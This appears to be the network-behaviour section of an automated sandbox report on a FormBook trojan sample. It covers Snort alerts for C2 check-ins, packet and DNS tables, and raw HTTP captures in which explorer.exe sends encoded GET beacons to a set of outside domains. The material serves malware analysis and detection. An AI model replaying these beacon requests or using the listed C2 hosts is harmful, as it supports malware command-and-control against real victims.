                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    07/22/21-10:09:46.745988TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.352.5.43.61
                                                                    07/22/21-10:09:46.745988TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.352.5.43.61
                                                                    07/22/21-10:09:46.745988TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.352.5.43.61
                                                                    07/22/21-10:09:52.028852TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                                    07/22/21-10:09:52.028852TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                                    07/22/21-10:09:52.028852TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                                    07/22/21-10:09:52.168380TCP1201ATTACK-RESPONSES 403 Forbidden804973934.102.136.180192.168.2.3
                                                                    07/22/21-10:09:57.556419TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.350.87.238.189
                                                                    07/22/21-10:09:57.556419TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.350.87.238.189
                                                                    07/22/21-10:09:57.556419TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.350.87.238.189
                                                                    07/22/21-10:10:13.489747TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.350.87.248.20
                                                                    07/22/21-10:10:13.489747TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.350.87.248.20
                                                                    07/22/21-10:10:13.489747TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.350.87.248.20

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 22, 2021 10:09:30.576597929 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.709585905 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.709726095 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.709867954 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.842448950 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850486994 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850527048 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850545883 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850559950 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850578070 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850606918 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850624084 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850641012 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850658894 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850675106 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.850789070 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.850819111 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.850832939 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.983715057 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.983779907 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.983839989 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.983865023 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.983931065 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:30.983946085 CEST8049735198.185.159.144192.168.2.3
                                                                    Jul 22, 2021 10:09:30.984003067 CEST4973580192.168.2.3198.185.159.144
                                                                    Jul 22, 2021 10:09:41.096314907 CEST4973680192.168.2.364.227.87.162
                                                                    Jul 22, 2021 10:09:41.283951044 CEST804973664.227.87.162192.168.2.3
                                                                    Jul 22, 2021 10:09:41.284049034 CEST4973680192.168.2.364.227.87.162
                                                                    Jul 22, 2021 10:09:41.284584999 CEST4973680192.168.2.364.227.87.162
                                                                    Jul 22, 2021 10:09:41.472394943 CEST804973664.227.87.162192.168.2.3
                                                                    Jul 22, 2021 10:09:41.472515106 CEST804973664.227.87.162192.168.2.3
                                                                    Jul 22, 2021 10:09:41.472573042 CEST804973664.227.87.162192.168.2.3
                                                                    Jul 22, 2021 10:09:41.472721100 CEST4973680192.168.2.364.227.87.162
                                                                    Jul 22, 2021 10:09:41.472783089 CEST4973680192.168.2.364.227.87.162
                                                                    Jul 22, 2021 10:09:41.660042048 CEST804973664.227.87.162192.168.2.3
                                                                    Jul 22, 2021 10:09:46.582820892 CEST4973780192.168.2.352.5.43.61
                                                                    Jul 22, 2021 10:09:46.745685101 CEST804973752.5.43.61192.168.2.3
                                                                    Jul 22, 2021 10:09:46.745774031 CEST4973780192.168.2.352.5.43.61
                                                                    Jul 22, 2021 10:09:46.745987892 CEST4973780192.168.2.352.5.43.61
                                                                    Jul 22, 2021 10:09:46.909065962 CEST804973752.5.43.61192.168.2.3
                                                                    Jul 22, 2021 10:09:46.909236908 CEST4973780192.168.2.352.5.43.61
                                                                    Jul 22, 2021 10:09:46.909292936 CEST4973780192.168.2.352.5.43.61
                                                                    Jul 22, 2021 10:09:47.075243950 CEST804973752.5.43.61192.168.2.3
                                                                    Jul 22, 2021 10:09:51.986444950 CEST4973980192.168.2.334.102.136.180
                                                                    Jul 22, 2021 10:09:52.028575897 CEST804973934.102.136.180192.168.2.3
                                                                    Jul 22, 2021 10:09:52.028731108 CEST4973980192.168.2.334.102.136.180
                                                                    Jul 22, 2021 10:09:52.028851986 CEST4973980192.168.2.334.102.136.180
                                                                    Jul 22, 2021 10:09:52.070858002 CEST804973934.102.136.180192.168.2.3
                                                                    Jul 22, 2021 10:09:52.168380022 CEST804973934.102.136.180192.168.2.3
                                                                    Jul 22, 2021 10:09:52.168673992 CEST4973980192.168.2.334.102.136.180
                                                                    Jul 22, 2021 10:09:52.168807030 CEST804973934.102.136.180192.168.2.3
                                                                    Jul 22, 2021 10:09:52.168891907 CEST4973980192.168.2.334.102.136.180
                                                                    Jul 22, 2021 10:09:52.211878061 CEST804973934.102.136.180192.168.2.3
                                                                    Jul 22, 2021 10:09:57.375874996 CEST4974180192.168.2.350.87.238.189
                                                                    Jul 22, 2021 10:09:57.555730104 CEST804974150.87.238.189192.168.2.3
                                                                    Jul 22, 2021 10:09:57.555994987 CEST4974180192.168.2.350.87.238.189
                                                                    Jul 22, 2021 10:09:57.556418896 CEST4974180192.168.2.350.87.238.189
                                                                    Jul 22, 2021 10:09:57.735743999 CEST804974150.87.238.189192.168.2.3
                                                                    Jul 22, 2021 10:09:57.743305922 CEST804974150.87.238.189192.168.2.3
                                                                    Jul 22, 2021 10:09:57.743522882 CEST4974180192.168.2.350.87.238.189
                                                                    Jul 22, 2021 10:09:57.744333029 CEST804974150.87.238.189192.168.2.3
                                                                    Jul 22, 2021 10:09:57.744411945 CEST4974180192.168.2.350.87.238.189
                                                                    Jul 22, 2021 10:09:57.923999071 CEST804974150.87.238.189192.168.2.3
                                                                    Jul 22, 2021 10:10:02.840413094 CEST4974280192.168.2.3217.160.0.254
                                                                    Jul 22, 2021 10:10:02.887598038 CEST8049742217.160.0.254192.168.2.3
                                                                    Jul 22, 2021 10:10:02.887741089 CEST4974280192.168.2.3217.160.0.254
                                                                    Jul 22, 2021 10:10:02.959182978 CEST4974280192.168.2.3217.160.0.254
                                                                    Jul 22, 2021 10:10:03.006151915 CEST8049742217.160.0.254192.168.2.3
                                                                    Jul 22, 2021 10:10:03.012269020 CEST8049742217.160.0.254192.168.2.3
                                                                    Jul 22, 2021 10:10:03.012365103 CEST8049742217.160.0.254192.168.2.3
                                                                    Jul 22, 2021 10:10:03.012581110 CEST4974280192.168.2.3217.160.0.254
                                                                    Jul 22, 2021 10:10:03.102238894 CEST4974280192.168.2.3217.160.0.254
                                                                    Jul 22, 2021 10:10:03.151477098 CEST8049742217.160.0.254192.168.2.3
                                                                    Jul 22, 2021 10:10:13.309649944 CEST4974380192.168.2.350.87.248.20
                                                                    Jul 22, 2021 10:10:13.489243984 CEST804974350.87.248.20192.168.2.3
                                                                    Jul 22, 2021 10:10:13.489726067 CEST4974380192.168.2.350.87.248.20
                                                                    Jul 22, 2021 10:10:13.489747047 CEST4974380192.168.2.350.87.248.20
                                                                    Jul 22, 2021 10:10:13.672003984 CEST804974350.87.248.20192.168.2.3
                                                                    Jul 22, 2021 10:10:13.687524080 CEST804974350.87.248.20192.168.2.3
                                                                    Jul 22, 2021 10:10:13.687553883 CEST804974350.87.248.20192.168.2.3
                                                                    Jul 22, 2021 10:10:13.687732935 CEST4974380192.168.2.350.87.248.20
                                                                    Jul 22, 2021 10:10:13.688079119 CEST4974380192.168.2.350.87.248.20
                                                                    Jul 22, 2021 10:10:13.867357016 CEST804974350.87.248.20192.168.2.3

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 22, 2021 10:08:11.309405088 CEST5062053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:11.358716011 CEST53506208.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:12.009732962 CEST6493853192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:12.101109028 CEST53649388.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:12.238713980 CEST6015253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:12.290486097 CEST53601528.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:14.522972107 CEST5754453192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:14.579864979 CEST53575448.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:27.852622032 CEST5598453192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:27.905174017 CEST53559848.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:30.346405983 CEST6418553192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:30.398354053 CEST53641858.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:31.613595963 CEST6511053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:31.662669897 CEST53651108.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:36.394907951 CEST5836153192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:36.456167936 CEST53583618.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:39.245728970 CEST6349253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:39.302848101 CEST53634928.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:40.089693069 CEST6083153192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:40.141911030 CEST53608318.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:41.045433044 CEST6010053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:41.095683098 CEST53601008.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:42.972035885 CEST5319553192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:43.003645897 CEST5014153192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:43.043905020 CEST53531958.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:43.053142071 CEST53501418.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:43.882522106 CEST5302353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:43.934840918 CEST53530238.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:44.763690948 CEST4956353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:44.815905094 CEST53495638.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:45.577502966 CEST5135253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:45.629818916 CEST53513528.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:46.608787060 CEST5934953192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:46.662081957 CEST53593498.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:47.567668915 CEST5708453192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:47.619707108 CEST53570848.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:48.303457022 CEST5882353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:48.363425016 CEST53588238.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:48.554132938 CEST5756853192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:48.606364965 CEST53575688.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:49.458520889 CEST5054053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:49.509917021 CEST53505408.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:50.246840954 CEST5436653192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:50.307749033 CEST53543668.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:08:51.109283924 CEST5303453192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:08:51.166553020 CEST53530348.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:04.199525118 CEST5776253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:04.256830931 CEST53577628.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:05.608653069 CEST5543553192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:05.661124945 CEST53554358.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:09.900319099 CEST5071353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:09.962426901 CEST53507138.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:27.593406916 CEST5613253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:27.662265062 CEST53561328.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:30.499138117 CEST5898753192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:30.569478035 CEST53589878.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:35.859954119 CEST5657953192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:36.011416912 CEST53565798.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:41.030852079 CEST6063353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:41.094779968 CEST53606338.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:46.517425060 CEST6129253192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:46.580676079 CEST53612928.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:51.038237095 CEST6361953192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:51.095227957 CEST53636198.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:51.921794891 CEST6493853192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:51.985435009 CEST53649388.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:54.164046049 CEST6194653192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:54.229479074 CEST53619468.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:09:57.199111938 CEST6491053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:09:57.373522997 CEST53649108.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:02.774408102 CEST5212353192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:02.839271069 CEST53521238.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:13.128496885 CEST5613053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:13.306884050 CEST53561308.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:18.741259098 CEST5633853192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:18.806142092 CEST53563388.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:23.817125082 CEST5942053192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:24.250442982 CEST53594208.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:29.266855955 CEST5878453192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:29.331233025 CEST53587848.8.8.8192.168.2.3
                                                                    Jul 22, 2021 10:10:34.345170021 CEST6397853192.168.2.38.8.8.8
                                                                    Jul 22, 2021 10:10:34.419543982 CEST53639788.8.8.8192.168.2.3

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jul 22, 2021 10:09:30.499138117 CEST192.168.2.38.8.8.80xc232Standard query (0)www.chaneabond.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:35.859954119 CEST192.168.2.38.8.8.80xd65aStandard query (0)www.oikoschain.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:41.030852079 CEST192.168.2.38.8.8.80x6affStandard query (0)www.melodezu.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:46.517425060 CEST192.168.2.38.8.8.80xd443Standard query (0)www.cajunseafoodstcloud.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:51.921794891 CEST192.168.2.38.8.8.80xc357Standard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:57.199111938 CEST192.168.2.38.8.8.80x4d29Standard query (0)www.tinsley.websiteA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:02.774408102 CEST192.168.2.38.8.8.80x6d1aStandard query (0)www.surivaganza.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:13.128496885 CEST192.168.2.38.8.8.80xcf9fStandard query (0)www.matcitekids.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:18.741259098 CEST192.168.2.38.8.8.80xc04cStandard query (0)www.mydreamtv.netA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:23.817125082 CEST192.168.2.38.8.8.80x1117Standard query (0)www.monsoonnerd.comA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:29.266855955 CEST192.168.2.38.8.8.80xa2bbStandard query (0)www.avito-payment.lifeA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:34.345170021 CEST192.168.2.38.8.8.80x8ea6Standard query (0)www.wthcoffee.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jul 22, 2021 10:09:30.569478035 CEST8.8.8.8192.168.2.30xc232No error (0)www.chaneabond.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:09:30.569478035 CEST8.8.8.8192.168.2.30xc232No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:30.569478035 CEST8.8.8.8192.168.2.30xc232No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:30.569478035 CEST8.8.8.8192.168.2.30xc232No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:30.569478035 CEST8.8.8.8192.168.2.30xc232No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:36.011416912 CEST8.8.8.8192.168.2.30xd65aName error (3)www.oikoschain.comnonenoneA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:41.094779968 CEST8.8.8.8192.168.2.30x6affNo error (0)www.melodezu.commelodezu.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:09:41.094779968 CEST8.8.8.8192.168.2.30x6affNo error (0)melodezu.com64.227.87.162A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:46.580676079 CEST8.8.8.8192.168.2.30xd443No error (0)www.cajunseafoodstcloud.comcajunseafoodstcloud.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:09:46.580676079 CEST8.8.8.8192.168.2.30xd443No error (0)cajunseafoodstcloud.com52.5.43.61A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:51.985435009 CEST8.8.8.8192.168.2.30xc357No error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:09:51.985435009 CEST8.8.8.8192.168.2.30xc357No error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:09:57.373522997 CEST8.8.8.8192.168.2.30x4d29No error (0)www.tinsley.websitetinsley.websiteCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:09:57.373522997 CEST8.8.8.8192.168.2.30x4d29No error (0)tinsley.website50.87.238.189A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:02.839271069 CEST8.8.8.8192.168.2.30x6d1aNo error (0)www.surivaganza.com217.160.0.254A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:13.306884050 CEST8.8.8.8192.168.2.30xcf9fNo error (0)www.matcitekids.commatcitekids.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:10:13.306884050 CEST8.8.8.8192.168.2.30xcf9fNo error (0)matcitekids.com50.87.248.20A (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:18.806142092 CEST8.8.8.8192.168.2.30xc04cName error (3)www.mydreamtv.netnonenoneA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:24.250442982 CEST8.8.8.8192.168.2.30x1117Server failure (2)www.monsoonnerd.comnonenoneA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:29.331233025 CEST8.8.8.8192.168.2.30xa2bbName error (3)www.avito-payment.lifenonenoneA (IP address)IN (0x0001)
                                                                    Jul 22, 2021 10:10:34.419543982 CEST8.8.8.8192.168.2.30x8ea6No error (0)www.wthcoffee.comwthcoffee.comCNAME (Canonical name)IN (0x0001)
                                                                    Jul 22, 2021 10:10:34.419543982 CEST8.8.8.8192.168.2.30x8ea6No error (0)wthcoffee.com184.168.131.241A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.chaneabond.com
                                                                    • www.melodezu.com
                                                                    • www.cajunseafoodstcloud.com
                                                                    • www.extinctionbrews.com
                                                                    • www.tinsley.website
                                                                    • www.surivaganza.com
                                                                    • www.matcitekids.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.349735198.185.159.14480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:09:30.709867954 CEST8966OUTGET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.chaneabond.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:09:30.850486994 CEST8968INHTTP/1.1 400 Bad Request
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Length: 77564
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Thu, 22 Jul 2021 08:09:30 UTC
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                    Pragma: no-cache
                                                                    Server: Squarespace
                                                                    X-Contextid: xRDopGny/s0ICaPnB
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.34973664.227.87.16280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:09:41.284584999 CEST8985OUTGET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.melodezu.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:09:41.472515106 CEST8986INHTTP/1.1 404 Not Found
